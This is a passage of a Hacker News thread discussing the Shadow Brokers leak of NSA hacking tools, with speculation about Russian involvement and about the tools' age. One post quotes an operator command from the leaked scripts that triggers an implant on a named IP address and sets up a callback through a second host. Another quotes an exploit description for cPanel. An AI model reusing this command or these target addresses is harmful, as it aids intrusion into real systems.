Live data from Hacker News

Snowden: NSA just lost control of its Top Secret arsenal of digital weapons

twitter.com

31–40 of 323 posts

Re: Snowden: NSA just lost control of its Top Secret arsenal of digital weapons

#31
post #27

I don't know anything about the value of this crap, but I do find it interesting to grep through looking at the IPs (which I presume are compromised machines from which they are initiating attacks). See `./bin/pyside/targets.py`

202.38.128.1 - http://ihep.ac.cn/ - Chinese Academy of Sciences High Energy Physics

211.40.103.194 - http://utc21.co.kr - Korea

from: https://github.com/x0rz/EQGRP/blob/master/Linux/etc/opscript...

#### JACKLADDER - triggering IN thru JACKPOP on Linux (FAINTSPIRIT) ####

### Local window, let this sit and wait: ourtn -T 202.38.128.1 -n -I -ue -O 113 -p 443 -C 211.40.103.194 127.0.0.1

### on PITCH: set up window for nopen callback -nrtun 113

Re: Snowden: NSA just lost control of its Top Secret arsenal of digital weapons

#32
post #23

Looking through some of the code and some of the docs, these look old. In absence of a lot of time or some missing docs, not sure how usable these things are.

In the article pointed out by Snowden: https://www.nytimes.com/2016/08/17/us/shadow-brokers-leak-ra... they state that the stolen code is from 2013 and Snowden was quoted in Wikipedia saying "circumstantial evidence and conventional wisdom indicates Russian responsibility". To me it seems impossible that non-state-sponsored hackers would have gotten their hands into top secret NSA hacking tools. If I'd have guess it…

"conventional wisdom", which means "knowledge of conventions and traditions", in this case means "guessing".

Re: Snowden: NSA just lost control of its Top Secret arsenal of digital weapons

#33

Asking a president to do x,y or z by making this type of public statement probably implies it's geared towards the immediate readers and not some leader that might read it. The security agencies might have made a lot of enemy over the years so it's not clear who benefits from this. Either financially or as ego boost. The internet is definitely bigger that what most people might have predicted 20 years ago. So its not…

The cynical and conspiracy theory believing person might suspect that regardless of all the reasons stated for the release the last one, namely the attack in Syria, is the only one that actually prompted this.

I don't necessarily subscribe to the whole "Russia is controlling everything" line (there still so much that's unknown for sure), but it sure is easy to see a connection between Trump launching missiles against Syria which is supported by Russia, and with an embarrassing and costly release of secret information belonging to the security apparatus in the U.S. by what many people say is a front for the Russian security apparatus. Whether that connection is really there is another thing, but that narrative sure is easy to follow.

Re: Snowden: NSA just lost control of its Top Secret arsenal of digital weapons

#34
post #16

Earlier quoted context omitted.

http://pan.webis.de/clef17/pan17-web/author-obfuscation.html

Yes, I'm aware, or, I speculate that ShadowBrokers are utilizing this to unduly burden Eastern Europeans, Russians and Chinese hackers but really, asymmetric information is asymmetric. We just don't know. But now we can speculate that they are American citizens, with their mention of voting for the US President.

They could also just lie to gain support from impressionable readers and/or disgruntled Trump voters.

Re: Snowden: NSA just lost control of its Top Secret arsenal of digital weapons

#35
post #23

Looking through some of the code and some of the docs, these look old. In absence of a lot of time or some missing docs, not sure how usable these things are.

In the article pointed out by Snowden: https://www.nytimes.com/2016/08/17/us/shadow-brokers-leak-ra... they state that the stolen code is from 2013 and Snowden was quoted in Wikipedia saying "circumstantial evidence and conventional wisdom indicates Russian responsibility". To me it seems impossible that non-state-sponsored hackers would have gotten their hands into top secret NSA hacking tools. If I'd have guess it…

[deleted]

Re: Snowden: NSA just lost control of its Top Secret arsenal of digital weapons

#36
post #23

Looking through some of the code and some of the docs, these look old. In absence of a lot of time or some missing docs, not sure how usable these things are.

In the article pointed out by Snowden: https://www.nytimes.com/2016/08/17/us/shadow-brokers-leak-ra... they state that the stolen code is from 2013 and Snowden was quoted in Wikipedia saying "circumstantial evidence and conventional wisdom indicates Russian responsibility". To me it seems impossible that non-state-sponsored hackers would have gotten their hands into top secret NSA hacking tools. If I'd have guess it…

These look much older than 2013. So much of this stuff is targeted at sun/sco.. the only thing I can suggest is: most state/government systems are simply ancient.. so their tools will be tailored to their targets.

Re: Snowden: NSA just lost control of its Top Secret arsenal of digital weapons

#37

Looking through some of the code and some of the docs, these look old. In absence of a lot of time or some missing docs, not sure how usable these things are.

For example, this tool says: https://github.com/x0rz/EQGRP/blob/master/Linux/doc/user.too...

# ELATEDMONKEY is a local privelege escalation exploit against systems running the cPanel Remote Management Web Interface, at least through version 24, and probably future versions too (althogh that should be checked before throwing).

It has been tested explicitly on cPanel 11.23.3 and 11.24.4 running CentOS 5.2 Linux

--

Those versions are from 2008/2009

Re: Snowden: NSA just lost control of its Top Secret arsenal of digital weapons

#38

It's pretty fascinating to read the Shadow Broker's posts. They have to write something, since they can't just say "I work for Russia and we're reminding America that they're not invulnerable." So they have to come up with all sorts of contrived reasons about why they're doing this, complete with broken english to fool stylometry detection that walks the fine line between being believable and preposterous. Someone sp…

Alternatively, they're someone else trying to look as if they're Russian-affiliated when they're not. "I work for Russia" would be unbelievable, so they sidle around trying to look suspiciously Russian without saying so.

Re: Snowden: NSA just lost control of its Top Secret arsenal of digital weapons

#40

It's pretty fascinating to read the Shadow Broker's posts. They have to write something, since they can't just say "I work for Russia and we're reminding America that they're not invulnerable." So they have to come up with all sorts of contrived reasons about why they're doing this, complete with broken english to fool stylometry detection that walks the fine line between being believable and preposterous. Someone sp…

As a Russian myself, I can tell you with certainty that there are mistakes in that text that a Russian ESL speaker would never make, and verb tenses are a bit too good for an unskilled speaker. Due to the combination of these two factors, I bet this was written by a native English speaker who thinks he/she knows the mistakes a Russian would make. They're wrong.
Post reply on HN